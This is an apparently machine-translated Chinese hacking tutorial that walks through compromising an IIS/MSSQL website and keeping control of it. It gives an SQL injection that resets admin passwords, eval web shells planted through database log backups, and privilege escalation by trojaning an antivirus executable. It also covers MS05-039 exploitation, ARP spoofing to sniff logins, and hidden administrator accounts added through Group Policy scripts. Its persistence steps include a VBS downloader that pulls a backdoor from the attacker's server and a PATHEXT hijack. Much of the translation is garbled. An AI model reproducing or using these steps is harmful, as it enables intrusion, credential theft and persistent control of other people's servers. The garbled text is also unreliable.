Search CKL Inurl: ASP in Baidu, Search, as long as it is the MSSQL database, it must be DB_OWNER permission, at least I haven't seen it yet.
Public, DB_OWNER has all operational rights to the currently connected database, you can execute select, update, delete.create.drop, etc.
In the search, find a CHINA-level website, which is DB_OWNER permission, browse the website, discovers above a mobile network 7.1 Forum, pass
WHOIS.WEBHOSTING.INFO query, found that there is a website, it should be a personal host, find IIS5.0, windows2000! "through Telnet Target 80!
1, get WebShell
There are two ideas. The first is from the website to start
First, start from the tomatogram, find the user table that is discovered by the mobile network that is stored, the field of this table, find out the administrator's username and password, the password is MD5 encryption, to www.xmd5.org is Solution, I found that the administrator still has some security awareness, not a weak pass. That we are
DB_OWNER permission, can be UPDATE, what is also afraid! Directly in the injection point www.target.com/list.id=1';update [user] set password = '49ba59abbe56e057' where id = 1 - of which 49ba59abbe56e057 is the 123456 MD5 encryption, Now, the password of the front desk administrator is now changed to 123456, and the same method will change the password of the background administrator to 123456, smooth login. Ok, now you can use the backup database method to get WebShell
Everyone knows that the network 7.1 cannot be backed up by the previous old method. Get the Webshell, check if it is a MDB file when backing up, if not, there is a countermeasure, build a table, insert try {EVAL in the field (Request.form ('#') '')} Catch (e) {} Pony of the ice courier, then change the table to 1.gif (or command using COPY) After uploading, remember The lower address, backup directly into A.asp in the background, successfully connected with the client of ice fox, and then upload a relatively rare horse.
The second is the idea
Direct differential backup, the method used here is Swan recently announced Backup log.
Alter Database XXXX SET Recovery Full
Backup log xxxx to disk = 'c: / sammy' with init
CREATE TABLE CMD (A Image)
INSERT INTO CMD (A) VALUES ('')
Backup log xxxx to disk = 'c: /xxx/2.asp'
Where XXXX is a database, it is for fault tolerance.
Apply this method to get a WebShell
It is of course a vulnerability to find improvement privileges. Of course, serv-u and pcanywhere are considered, see the traces of PCANywhere in the system service list, enter C: / Documents and settings / all users / application data / symantec / Pcanywhere gets a .cif file, get the username with the user name with pcanywhere passview, use the PCANywhere login to find that only the administrators group can only log in, the good current idea is to find a self-started service program, found in the system service list A Rising, Path D: / Program Files / Rising / RAV Download Rising.exe, then bundled a user's VBS, then change the target's Rising.exe, and upload the bundled Rising.exe Go. Just wait for the server to restart. I am very patient. The way of proposal is a variety of ways, look at it yourself.
2. Safety of external network
I recently read a lot of ARP fraud articles, so I tried it. First, ping www.target.com get IP1.1.1.2, scanning 1.1.1.0-1.1.1.255 via PortReady, through the previously popular MS05039, smooth get one Machine 1.1.1.3, and opened 3389, download WinPCAP driver (driver-dependent driver) after entering, then download an arpspoof, and then the TRACERT discovery gateway is 1.1.1.1. I will talk about ARP deception. The principle, the ARP is the address resolution protocol, which is the protocol of the OSI's network layer (IP layer) to the data link layer (MAC). Communication in the LAN is not as an address as an address, but the physical address, that is, MAC. Then we can make evil deception, such as 3 hosts, ABC, A is your machine, b is the host you want to deceive, C is a gateway, then we can send an ARP answer to C, saying that I am B Give C my MAC address, deceive B, I am a gateway, and give him my Mac
Address, they will misunderstand, and flow all the data to B to A. The CPU of this A will be loaded, which may result in crash.
Personally think the protection method, the active method is to bind Mac and IP solid state
Arpspoof is such a tool. Command format arpspoof [spoof ip1] [spoof ip2] [OWN IP]
Run Arpspoof 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.12 1.1.1.3 21 C: /Log.txt
It is now waiting for the administrator to log in.
3. Skinant chicken
It's hard to get the broiler. Of course, we can use the creation of the creation of the folder, such as a folder A, then we are in CMD, turn
Go to the current path, enter MKDir a ../ This creates a folder a ../, and when you open this file, you point to the A folder, then we can prevent an ASP Trojan inside, and then use NetBox points to this Document, this ASP Troja is SYSTEM permissions. When we visit www.target.com/a../ASP Trojans can use IIS5.0 vulnerabilities, create a virtual green catalog A In this virtual green catalog, create a virtual green directory B, and specify the file address, and remove the protection of IIS, then delete our first virtual green catalog a, so when we visit, WWW .target.com / a / b / asp Trojan. It also has SYSTEM permissions. Then we can use this method in order to prevent it.
Net User Jouan $ 123456 / Add
Net localgroup administrators jouanc $ / add saved to 1.vbs and placed in C: / Winnt / System32 / GroupPolicy / Machine / Scripts / Startup / this directory
NET User Jouanc $ / DEL is saved to 2.VBS and placed in C: / Winnt / System32 / GroupPolicy / Machine / Scripts / Shutdown /
Save the following to Script.ini and put it in C: / Winnt / System32 / GroupPolicy / Machine / Scripts
[Startup]
0cmdline = 1.vbs
0Parameters =
[Shutdown]
0cmdline = 2.vbs
0Parameters =
I still have an idea that I have built a "VBS downloaded from the Internet" quite with Downloader, download us from our own space. We have a good back door.
Then use a BAT, use if to determine whether we download our back door, then run it, then run these two tied, put it in Startup.
In Shutdown, put a DEL "our Trojan" BAT, the prerequisite IE can open, I have entered some broilers, to open IE, must be set.
There is also a trick, everyone enters SET under CMD
Two lines
PATH = D: / Winnt / System32; D: / Winnt; D: / Winnt / System32 / WBEM
PATHEXT = .com; .exe ;.bat; .cmd; .vbs; .vbe; .js; .jse; .wsf; .wsh
Know, .com's most priority, then we can put a www.google.com, pay attention to "www.google.com" is our Trojan, we put it in D: / Winnt / System32, haha, as broiler Open IE, type www.google.com, IE will only find our Trojan first
Unless he entered "http://www.google.com"
In fact, there are a lot of ways to protect broilers. I really like this method of protecting broilers. I will not be killed, and I can grasp broilers.
There are some social engineering ideas in the article, very interesting. Although there are some older technologies, it can be used under fluctuations. Ha ha
When the right is proposed, let's go in a msn.com.